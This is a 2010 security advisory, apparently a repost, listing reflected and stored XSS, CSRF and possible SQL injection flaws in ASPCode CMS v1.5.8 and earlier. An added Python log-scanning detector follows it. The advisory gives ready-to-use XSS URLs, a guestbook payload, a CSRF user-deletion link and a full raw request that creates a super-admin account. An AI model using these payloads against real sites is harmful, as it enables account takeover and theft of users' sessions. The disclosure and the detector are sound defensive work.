
ASPCode CMS <= v1.5.8 Multiple Vulnerabilities

Posted on 30 April 2010

==============================================
ASPCode CMS <= v1.5.8 Multiple Vulnerabilities
==============================================

# Multiple Vulnerabilities in ASPCode CMS
#
# [Software Version]: <= v1.5.8
# [Vendor WebSite]: www.aspcodecms.com
# [Date]: 01 January 2010
#
# Found by Alberto "fulgur" Fontanella
#
# itsicurezza<0x40>yahoo.it - ictsec.wordpress.com
#

[1] - [Multiple XSS Vulnerabilities]

http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>
http://[host]/default.asp?sec=1&tag="><script>alert("XSS");</script>
http://[host]/default.asp?sec=1&ma2="><script>alert("XSS");</script>

XSS is also present on the password reset form:
http://[host]/default.asp?sec=33&ma1=forgotpass
Put the XSS string in the Email field and submit it.

[2] - [Persistent XSS]

Post the following in the Guestbook section:
http://[host]/default.asp?sec=23

<img src="http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>"></img>

[3] - [CSRF]

To delete a user account:
http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=delete&idx=50

To create a Super Admin account:

POST /default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=update&idx=-1 HTTP/1.1
Host: [host]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=edit&idx=-1
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

username=HAXOR&password=PASSWD&old_password=&password_is_encrypted=false&email=HAXOR%40BLACKHAT.ORG&roleId=4&redirsectionid=0&confirmed=true

CSRF can be combined with XSS (very dangerous).

[4] - [Possible SQL Injection]

http://[host]/default.asp?sec=64&ma1=tag&tag=CMS'

Errore numero: -2147217900
Errore: Errore di sintassi (operatore mancante) nell'espressione della query '[ID] IN ()'.
Query: SELECT * FROM [section] s WHERE [ID] IN ()

http://[host]/default.asp=sec=1'

Errore di run-time di Microsoft VBScript (0x800A000D)
Tipo non corrispondente: 'sectionID'
/include/api.asp, line 657

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-04-30]
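As an added example (not part of the advisory or of ASPCode CMS), a Python detector that scans web-server access-log lines for the request patterns the advisory lists: script markup in the reflected ma1/ma2/tag parameters (item [1]), a single quote in the tag parameter that produces the raw ADO error (item [4]), and delete/update actions in the admin users module that carry no CSRF token (item [3]). The log lines, client IPs and label names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format); they are not from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Apr/2010:10:00:01 +0000] "GET /default.asp?sec=1&ma1=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E HTTP/1.1" 200 512
203.0.113.7 - - [30/Apr/2010:10:00:02 +0000] "GET /default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=delete&idx=50 HTTP/1.1" 302 0
203.0.113.7 - - [30/Apr/2010:10:00:03 +0000] "GET /default.asp?sec=64&ma1=tag&tag=CMS' HTTP/1.1" 500 1024
198.51.100.4 - - [30/Apr/2010:10:00:04 +0000] "GET /default.asp?sec=23 HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameters the advisory shows being reflected unescaped, and markup fragments its payloads need.
REFLECTED_PARAMS = ("ma1", "ma2", "tag")
XSS_MARKERS = ("<script", '">', "javascript:", "onerror=")


def classify(line):
    """Return finding labels for one access-log line that targets default.asp."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    if url.path.lower() != "/default.asp":
        return []
    # parse_qs percent-decodes values, so encoded payloads are inspected in decoded form
    params = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    findings = []
    if any(marker in v.lower() for name in REFLECTED_PARAMS for v in params.get(name, []) for marker in XSS_MARKERS):
        findings.append("xss-probe")
    # Item [4]: a single quote in the tag parameter makes the CMS emit a raw ADO error
    if "xss-probe" not in findings and any("'" in v for v in params.get("tag", [])):
        findings.append("sqli-probe")
    # Item [3]: delete/update in the admin users module carries no CSRF token, so each such
    # request should be reviewed against the session and Referer that issued it
    if params.get("module") == ["users"] and params.get("ma2", [""])[0] in ("delete", "update"):
        findings.append("user-admin-action")
    return findings


def scan(log_text):
    """Map each flagged line to (client IP, findings), skipping lines with nothing to report."""
    results = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            results.append((LOG_RE.match(line)["ip"], findings))
    return results
```

The "user-admin-action" label is a review trigger rather than proof of attack: a legitimate administrator produces the same request, so it should be correlated with the session and Referer of the request.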
